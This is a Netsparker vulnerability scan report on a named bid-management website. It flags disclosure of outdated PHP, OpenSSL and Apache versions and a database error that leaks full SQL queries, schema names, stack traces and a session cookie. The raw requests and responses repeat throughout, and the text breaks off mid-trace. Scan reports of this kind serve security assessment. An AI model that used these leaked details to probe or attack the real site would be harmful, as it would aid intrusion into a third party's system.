<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
PHP Version Disclosure
PHP Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.
Impact
An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
|
- /
/ |
Extracted Version
PHP/5.2.3
Request
GET / HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
OpenSSL Version Disclosure
OpenSSL Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing OpenSSL version in the HTTP response. This information can help an attacker to develop further attacks and also the system can become an easier target for automated attacks.
Impact
An attacker can look for specific security vulnerabilities for the identified version. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
Remedy
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /
/ |
Extracted Version
OpenSSL/0.9.8e
Request
GET / HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Apache Module Version Disclosure
Apache Module Version Disclosure
1
TOTAL
LOW
Netsparker identified that the target web server is disclosing one of the Apache modules version. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.
Impact
An attacker can look for specific security vulnerabilities for the identified Apache module version. The attacker can also use this information in conjunction with the other vulnerabilities in the application or the web server.
Remedy
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /
/ |
Extracted Version
mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Request
GET / HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 302 Found
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Date: Tue, 01 Mar 2011 20:01:22 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Location: http://qap.questcdn.com/qap/
Content-Length: 355
Keep-Alive: timeout=15000, max=300
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://qap.questcdn.com/qap/">here</a>.</p><hr><address>Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6 Server at qap.questcdn.com Port 80</address></body></html>
Database Error Message
Database Error Message
1
TOTAL
LOW
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Remedy
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK= HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:01:23 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:23 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11907
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> <font color="#FF0000">2011/03/01 14:01:25.011 [ 1] (TP-Processor1879) Problem including template component SQLLOOP query="SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = <?p:jobPK?> AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' " name="ProjectOwnerInfo"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00936: missing expression while executing: SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <font color="#FF0000">2011/03/01 14:01:25.027 [ 1] (TP-Processor1879) Problem including template component SQLLOOP query="SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = <?p:jobPK?> AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = <?p:jobPK?> AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC " name="PlanHolders"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00936: missing expression while executing: SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </td> </tr> </table></body></html>
Date: Tue, 01 Mar 2011 20:01:23 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:01:23 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 11907
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group=11&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Results</title></head><body> <font color="#FF0000">2011/03/01 14:01:25.011 [ 1] (TP-Processor1879) Problem including template component SQLLOOP query="SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = <?p:jobPK?> AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' " name="ProjectOwnerInfo"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00936: missing expression while executing: SELECT j.name, p.company, p.contact, p.phone, p.email_address, TO_CHAR(j.award_date, 'MM/DD/YYYY') Award_Date, j.job_no, j.bid_tab_file_name, j.Award_Final, j.Job_Comment, TO_CHAR(j.Bid_Date, 'MM/DD/YYYY HH:MI:SS PM') Bid_Date FROM jobs j, job_professionals jp, professionals p WHERE j.job_no = AND jp.job_no = j.job_no AND jp.professional_no = p.professional_no AND p.PROJ_SOLICITING_AGENT = 'y' at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <font color="#FF0000">2011/03/01 14:01:25.027 [ 1] (TP-Processor1879) Problem including template component SQLLOOP query="SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = <?p:jobPK?> AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = <?p:jobPK?> AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC " name="PlanHolders"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00936: missing expression while executing: SELECT ma.company_name, u.name, aa.phone, u.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM member_accounts ma ,users u ,addresses addr ,address_types addrt ,account_addresses aa ,plan_holders ph ,jobs j WHERE j.job_no = AND j.job_no = ph.job_no AND ph.member_no = ma.member_no (+) AND ph.user_no = u.user_no AND u.member_no = ma.member_no AND ma.member_no = aa.member_no AND aa.address_type_no = addrt.address_type_no AND addrt.name = 'main' AND aa.address_no = addr.address_no AND ph.bid_amount IS NOT NULL UNION SELECT ph.company_name, ph.contact_name, ph.phone, ph.email, ph.bid_amount, to_number(ph.bid_amount), DECODE(ph.Awarded,'Y','Yes','') Awarded FROM plan_holders ph WHERE ph.job_no = AND manual_planholder = 1 AND ph.bid_amount IS NOT NULL ORDER BY 6 ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at 